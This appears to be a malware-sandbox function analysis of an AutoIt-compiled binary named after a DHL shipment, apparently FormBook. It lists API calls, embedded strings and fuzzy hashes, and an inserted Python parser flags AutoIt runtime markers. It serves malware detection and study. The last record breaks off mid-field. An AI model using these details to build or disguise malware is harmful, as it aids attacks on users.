                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: bbd64d3b9c59b028f6d107ae48a90d08967c8c85832a662caa805afc3cee4c77
                                                                                        • Instruction ID: 98477b97d4af99c9643fb089984ab2ff121e8c4bf89dd098c1bd0453e042b919
                                                                                        • Opcode Fuzzy Hash: bbd64d3b9c59b028f6d107ae48a90d08967c8c85832a662caa805afc3cee4c77
                                                                                        • Instruction Fuzzy Hash: 1B319035948209ABDB14FA61DE03EEE7764AF10712F200729BC52710D1EB627F48F656
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00C75013
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00C7501E
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00C75029
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00C75034
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00C7503F
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00C7504A
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00C75055
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00C75060
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00C7506B
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00C75076
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00C75081
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00C7508C
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00C75097
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00C750A2
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00C750AD
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00C750B8
                                                                                        • GetCursorInfo.USER32(?), ref: 00C750C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: dbc4e1fb46d3cb50b62ede9e0e27e24905af8ae0ef9a04aed7c90c8d80ffad90
                                                                                        • Instruction ID: 3dfab29f26f5001595aacec2d1880db80c5fed4a1bbeaef7f0d22bf32261e83d
                                                                                        • Opcode Fuzzy Hash: dbc4e1fb46d3cb50b62ede9e0e27e24905af8ae0ef9a04aed7c90c8d80ffad90
                                                                                        • Instruction Fuzzy Hash: 393105B1D483196ADF109FB68C8995FBFE8FF04750F50452AA51DE7280DA786501CF91
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00C84424
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C8446F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-383632319
                                                                                        • Opcode ID: f23a6cd093575ca4626d398eb0593329779feb50e27174dcdb304478db650554
                                                                                        • Instruction ID: 55240575c643b3cc37ac39c4386704e91ea9eaabfd3f5eea0157a803d12dd062
                                                                                        • Opcode Fuzzy Hash: f23a6cd093575ca4626d398eb0593329779feb50e27174dcdb304478db650554
                                                                                        • Instruction Fuzzy Hash: 6D9189702043129FCB08EF10C451A6EB7A1EF95354F548969F8A65B3E3DB30ED4AEB85
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C8B8B4
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00C86B11,?), ref: 00C8B910
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8B949
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C8B98C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C8B9C3
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C8B9CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C8B9DF
                                                                                        • DestroyIcon.USER32(?), ref: 00C8B9EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C8BA0B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C8BA17
                                                                                          • Part of subcall function 00C22EFD: __wcsicmp_l.LIBCMT ref: 00C22F86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl$@U=u
                                                                                        • API String ID: 1212759294-1639919054
                                                                                        • Opcode ID: b5e0d4e7e42c510694d9356ea0d0abdade88fc8f70e1301c74daaff3366ce947
                                                                                        • Instruction ID: 48ac5af0a3ee3d40876b7a5da79f03a48b86c601de2f1016d2084c989e14140e
                                                                                        • Opcode Fuzzy Hash: b5e0d4e7e42c510694d9356ea0d0abdade88fc8f70e1301c74daaff3366ce947
                                                                                        • Instruction Fuzzy Hash: F361F071500219BBEB24EF64DC41FBE7BB8EB08715F104219F921D61C1DB74AE81DBA4
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00C6A3CB
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00C6A418
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6A460
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6A497
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C6A4C5
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 2698844021-4113822522
                                                                                        • Opcode ID: fc74b5ffc8d1b2f1482a5e8fe616209ea5e965460f4887301d153a889882d542
                                                                                        • Instruction ID: 0ec348839ed85c995b1bc51fb2aecf273fc092202aeb708ae46bd996899ec8b9
                                                                                        • Opcode Fuzzy Hash: fc74b5ffc8d1b2f1482a5e8fe616209ea5e965460f4887301d153a889882d542
                                                                                        • Instruction Fuzzy Hash: 0D514F715083059FC704EF10C89196AB7E8FF94758F10896DF89A672A2DB31EE0ADF52
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C5F8DF
                                                                                        • LoadStringW.USER32(00000000,?,00C3E029,00000001), ref: 00C5F8E8
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00CC5310,?,00000FFF,?,?,00C3E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C5F90A
                                                                                        • LoadStringW.USER32(00000000,?,00C3E029,00000001), ref: 00C5F90D
                                                                                        • __swprintf.LIBCMT ref: 00C5F95D
                                                                                        • __swprintf.LIBCMT ref: 00C5F96E
                                                                                        • _wprintf.LIBCMT ref: 00C5FA17
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5FA2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 984253442-2268648507
                                                                                        • Opcode ID: 2bcf7f8fb861322d6d7cb57d6b5c93428f8f6e95738a02ea206ae966c10f9d7a
                                                                                        • Instruction ID: f63ea2c9dae755b246ee9f6d0bc472f9dc4790a28cf1e479e4b3a8e25484f0fd
                                                                                        • Opcode Fuzzy Hash: 2bcf7f8fb861322d6d7cb57d6b5c93428f8f6e95738a02ea206ae966c10f9d7a
                                                                                        • Instruction Fuzzy Hash: 2D412C72C04219ABCF09FBE0DD86EEEB778AF14301F100165B60576092EA356F4AEB65
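The function records on this page all share one layout: an "APIs" list of resolved calls with their reference addresses, an optional "Strings" header, the memory dump the function was lifted from, and a "Similarity" block carrying the String ID field (entries separated by "$"), the API String ID and the opcode and instruction fuzzy hashes. Working through hundreds of these by eye is slow, and most of the String ID entries in this section ("@GUI_DRAGFILE", "[REGEXPTITLE:", "type cdaudio alias cd wait", 'Line %d (File "%s"):', "^ ERROR") are AutoIt runtime strings rather than anything the FormBook payload wrote, which is what the "Binary is likely a compiled AutoIt script file" signature rests on. The following is an added example, not Joe Sandbox code and not part of the original report: a parser for this record layout as it appears on the page, with a check that collects those AutoIt markers. The record format is inferred from the visible lines, the sample input is constructed from two of the records above with the hashes shortened, and the marker list is limited to strings that actually appear in this section. The fuzzy-hash algorithm is Joe Sandbox's own and is not described on the page; the script only carries the values through so records can be grouped or compared against a clean AutoIt interpreter.

```python
"""Parse Joe Sandbox per-function analysis records and flag AutoIt runtime strings.

Added example for this report page, not Joe Sandbox code. The record layout is
inferred from the visible page; SAMPLE is constructed from two records above
with the fuzzy hashes shortened.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two records in the page's layout (indentation removed, hashes shortened).
SAMPLE = """\
APIs
  • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
• LoadCursorW.USER32(00000000,00007F8A), ref: 00C75013
• GetCursorInfo.USER32(?), ref: 00C750C8
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode Fuzzy Hash: dbc4e1fb46d3cb50
• Instruction Fuzzy Hash: 393105B1D483196A
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF), ref: 00C5F8DF
• _wprintf.LIBCMT ref: 00C5FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5FA2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode Fuzzy Hash: 2bcf7f8fb861322d
• Instruction Fuzzy Hash: 2D412C72C04219AB
"""

# AutoIt runtime strings taken from the String ID fields in this section of the report.
# Several of them together corroborate the "compiled AutoIt script" verdict.
AUTOIT_MARKERS = frozenset({
    "@GUI_DRAGFILE", "@GUI_DRAGID", "@GUI_DROPID",   # GUI drag/drop macros
    "[CLASS:", "[REGEXPTITLE:",                      # advanced window-title syntax
    "type cdaudio alias cd wait",                    # CDTray() MCI command string
    'Line %d (File "%s"):', "^ ERROR",               # script runtime error box
})

# One resolved API line: optional "Part of subcall function X:" prefix, Name.MODULE(args), ref: addr.
# CRT entries such as "_wprintf.LIBCMT ref: ..." have no argument list.
_API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class Record:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""


def _field(line: str, key: str) -> str:
    """Text after '• <key>:' with exactly one separating space removed, so values
    such as 'Error: ' keep their own trailing whitespace."""
    value = line.split("•", 1)[1].lstrip()[len(key) + 1:]
    return value[1:] if value.startswith(" ") else value


def parse_records(text: str) -> list:
    """Split the report text into Record objects; each record opens with an 'APIs' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section headers (Strings, Similarity, Memory Dump Source, ...)
        m = _API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif line.startswith("• String ID:"):
            value = _field(line, "String ID")
            # '$' is the report's separator; a literal '$' inside a string would be split too.
            cur.strings = value.split("$") if value else []
        elif line.startswith("• API String ID:"):
            cur.api_string_id = _field(line, "API String ID")
        elif line.startswith("• Opcode Fuzzy Hash:"):
            cur.opcode_fuzzy = _field(line, "Opcode Fuzzy Hash")
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy = _field(line, "Instruction Fuzzy Hash")
    return records


def imports_by_module(records: list) -> dict:
    """Module -> sorted imported API names across all records, excluding CRT (LIBCMT) calls."""
    out = {}
    for rec in records:
        for call in rec.apis:
            if call.module != "LIBCMT":
                out.setdefault(call.module, set()).add(call.name)
    return {mod: sorted(names) for mod, names in out.items()}


def autoit_markers(records: list) -> list:
    """AutoIt runtime strings present in any record's String ID field, sorted."""
    return sorted({s for rec in records for s in rec.strings if s in AUTOIT_MARKERS})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records; imports by module: {imports_by_module(recs)}")
    print("AutoIt markers seen:", autoit_markers(recs))
```

Feed it the full text of the "Function Analysis" export rather than the constructed SAMPLE to get the complete import set and every marker hit; records whose String ID holds only payload-specific strings (no marker) are the ones worth opening in IDA first, since the AutoIt interpreter's own functions dominate the list.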
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00C6DA10
                                                                                        • _wcscat.LIBCMT ref: 00C6DA28
                                                                                        • _wcscat.LIBCMT ref: 00C6DA3A
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C6DA4F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6DA63
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00C6DA7B
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C6DA95
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6DAA7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
• String ID: *.*
• API String ID: 34673085-438819550
• Opcode ID: 0cfe87201191c3971b83f54f497eb33a868162be55ffd471999d543e344d638a
• Instruction ID: 7e07664624e361ed3800dfbdfb2801c876b3f363c1c94bf464dab35afaba8850
• Opcode Fuzzy Hash: 0cfe87201191c3971b83f54f497eb33a868162be55ffd471999d543e344d638a
• Instruction Fuzzy Hash: 53816471A083419FCB34DF65C884A6AB7E4EF89710F188D2EF49ACB251DA30DA45DB52
APIs
  • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C8C1FC
• GetFocus.USER32 ref: 00C8C20C
• GetDlgCtrlID.USER32(00000000), ref: 00C8C217
• _memset.LIBCMT ref: 00C8C342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C8C36D
• GetMenuItemCount.USER32(?), ref: 00C8C38D
• GetMenuItemID.USER32(?,00000000), ref: 00C8C3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C8C3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C8C41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C8C454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C8C489
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: c88f5d8cd8a60e6a018255bfcd6c554a113cacda3c5d20a47935db01778eb35c
• Instruction ID: dc78092416c217b2d9e1b635d1503b8c48b2db35e8c69cf34c7df0d2e0e1b30e
• Opcode Fuzzy Hash: c88f5d8cd8a60e6a018255bfcd6c554a113cacda3c5d20a47935db01778eb35c
• Instruction Fuzzy Hash: 68819D70608311AFD710EF14C8D4A7BBBE4FB88718F00492EF9A5972A1D770DA45CB66
APIs
• GetDC.USER32(00000000), ref: 00C7738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C7739B
• CreateCompatibleDC.GDI32(?), ref: 00C773A7
• SelectObject.GDI32(00000000,?), ref: 00C773B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C77408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C77444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C77468
• SelectObject.GDI32(00000006,?), ref: 00C77470
• DeleteObject.GDI32(?), ref: 00C77479
• DeleteDC.GDI32(00000006), ref: 00C77480
• ReleaseDC.USER32(00000000,?), ref: 00C7748B
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 1e8468b8a46664cc3fbf3acecb6bcd9c908360f7cee722694686d7a34d479cff
• Instruction ID: 145bcd46b29266c7cc444506a21d81e6005e2ba7c5d5368aeeeb9dd121fb7620
• Opcode Fuzzy Hash: 1e8468b8a46664cc3fbf3acecb6bcd9c908360f7cee722694686d7a34d479cff
• Instruction Fuzzy Hash: 25515875904209EFCB14CFA8CC85FAEBBB9EF48310F14852DF959A7221C731A9419B50
APIs
• timeGetTime.WINMM ref: 00C64F7A
  • Part of subcall function 00C2049F: timeGetTime.WINMM(?,753DB400,00C10E7B), ref: 00C204A3
• Sleep.KERNEL32(0000000A), ref: 00C64FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C64FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C64FEC
• SetActiveWindow.USER32 ref: 00C6500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C65019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00C65038
• Sleep.KERNEL32(000000FA), ref: 00C65043
• IsWindow.USER32 ref: 00C6504F
• EndDialog.USER32(00000000), ref: 00C65060
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: @U=u$BUTTON
• API String ID: 1194449130-2582809321
• Opcode ID: a5b1a5ef4e7fcce6fe65d7c11d093a45bc890cf7971bc180c53de776c401df15
• Instruction ID: 7bff85f136f78167d9c4db6965b99471e934d3fbaf5cac4eb5fa33cec5c5d996
• Opcode Fuzzy Hash: a5b1a5ef4e7fcce6fe65d7c11d093a45bc890cf7971bc180c53de776c401df15
• Instruction Fuzzy Hash: 00218970604605AFE7205F60EDC9F2E3BA9EF49745F241038F102C22B1DB719E519B66
APIs
  • Part of subcall function 00C20957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C06B0C,?,00008000), ref: 00C20973
  • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C06BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C06CFA
  • Part of subcall function 00C0586D: _wcscpy.LIBCMT ref: 00C058A5
  • Part of subcall function 00C2363D: _iswctype.LIBCMT ref: 00C23645
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: 9d320839cdbfea8be1980dfc450dcd7bc87f7f0efc4883047e376a6feff2867d
• Instruction ID: 35ecba1fc61bb03b17b97f4e05f94ac7e8ce702d833bc1f1d4503987fc986f7f
• Opcode Fuzzy Hash: 9d320839cdbfea8be1980dfc450dcd7bc87f7f0efc4883047e376a6feff2867d
• Instruction Fuzzy Hash: F8029D705083419FC724EF24C881AAFBBE5EF99314F14492DF496972E2DB30DA49DB52
APIs
• _memset.LIBCMT ref: 00C62D50
• GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C62DDD
• GetMenuItemCount.USER32(00CC5890), ref: 00C62E66
• DeleteMenu.USER32(00CC5890,00000005,00000000,000000F5,?,?), ref: 00C62EF6
• DeleteMenu.USER32(00CC5890,00000004,00000000), ref: 00C62EFE
• DeleteMenu.USER32(00CC5890,00000006,00000000), ref: 00C62F06
• DeleteMenu.USER32(00CC5890,00000003,00000000), ref: 00C62F0E
• GetMenuItemCount.USER32(00CC5890), ref: 00C62F16
• SetMenuItemInfoW.USER32(00CC5890,00000004,00000000,00000030), ref: 00C62F4C
• GetCursorPos.USER32(?), ref: 00C62F56
• SetForegroundWindow.USER32(00000000), ref: 00C62F5F
• TrackPopupMenuEx.USER32(00CC5890,00000000,?,00000000,00000000,00000000), ref: 00C62F72
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C62F7E
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 3993528054-0
• Opcode ID: 3c128a5253738066f541097172a270371cb06cf63bfd228862c3b4effd66e8e4
• Instruction ID: ace8b1c01833481a49fee3c797d945d2cfb3943ec1590339b7ea2aece4af9692
• Opcode Fuzzy Hash: 3c128a5253738066f541097172a270371cb06cf63bfd228862c3b4effd66e8e4
• Instruction Fuzzy Hash: 7E71F470605A15BBEB319F54DCC9FAABF64FF04324F10022AF625AA1E0C7726D20DB95
APIs
  • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
• _memset.LIBCMT ref: 00C5786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C578A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C578BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C578D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C57902
• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C5792A
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C57935
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5793A
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• API String ID: 1411258926-22481851
• Opcode ID: 15c378c92e32bd55ff22c06a9a4b3c0491312c5583fe6df70b89ac453b0dc30e
• Instruction ID: 2dbed3da5580a77ddfc0c88a55e289104172d61bb839fd580bd00d606e558c96
• Opcode Fuzzy Hash: 15c378c92e32bd55ff22c06a9a4b3c0491312c5583fe6df70b89ac453b0dc30e
• Instruction Fuzzy Hash: 6F412976C14229ABCF15EBA4EC45DEEB778BF04304F004229F915B31A1DB316E49DBA4
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 7e90cbc7d03c01bff2656df82f276ceee45f59f4bbc53c9cb2cda2371d34fa70
• Instruction ID: bbfdda1530a03f82dce4fa2951082846e70a0726c0487e94aff0198f11011dfc
